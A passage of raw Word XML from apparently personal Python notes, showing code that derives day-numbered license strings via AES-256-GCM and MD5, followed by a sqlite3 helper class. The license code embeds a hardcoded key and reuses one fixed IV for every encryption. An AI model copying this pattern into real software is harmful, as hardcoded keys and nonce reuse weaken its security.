          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(parts)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>formatted_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>key = binascii.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unhexlify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'fd2d9fb0bb4bc7a7e5d36e0cce8d26573950c4461c4d29afd46214e37e686197'</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iv = binascii.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unhexlify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'29cd7489b0a30e28fb589377'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>720</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plain = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"127.0.0.1shenyanjian"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(day)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    text = plain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>encode</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endata = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>encrypt_aes256gcm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(key, text, iv)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    digest = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(endata).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hexdigest</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license = digest[:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>16</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>format_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(license))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># other_data = binascii.unhexlify("d271bebe89d0b7f2669cdc540c48dc12862b56f570eb168794b6c4")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># plain_text = decrypt_aes256gcm(key, other_data, iv)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># print(plain_text.decode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62270D1E" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRPr="00B90B89" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5D7397" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594B4AED" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144C6077" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714C4DA8" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADD3196" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADA990E" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABEF734" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E15669" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRPr="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CE31B6" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2911AC28" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3A22EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="515" w:name="_Toc159779955"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlite3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p w14:paraId="775AFF57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class SchedualRecord:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902A89C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值通常直接是个元组为元素的列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760B5A2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="516" w:name="_Toc159779956"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化、连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
    </w:p>
    <w:p w14:paraId="2C8FC479" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def __init__(self, ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22711220" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    INIT_FLAT = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D129FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>if 'schedual.db' not in os.listdir():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0144E359" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        INIT_FLAT = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD27A4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:bookmarkStart w:id="517" w:name="OLE_LINK28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>self.conn = sqlite3.connect("schedual.db")</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="517"/>
    <w:p w14:paraId="07AA4221" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>self.cur = self.conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B79161" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>if INIT_FLAT == True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02510238" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.create_db()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CED8DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>已重置数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32626ACF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A84D90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="518" w:name="_Toc159779957"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="518"/>
    </w:p>
    <w:p w14:paraId="47B42FEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def __del__(self, ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F9427" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>self.cur.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13037C14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    self.conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BBD1ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def die(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B712F96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    self.cur.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B7A10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>self.conn.close()</w:t>
      </w:r>
    </w:p>
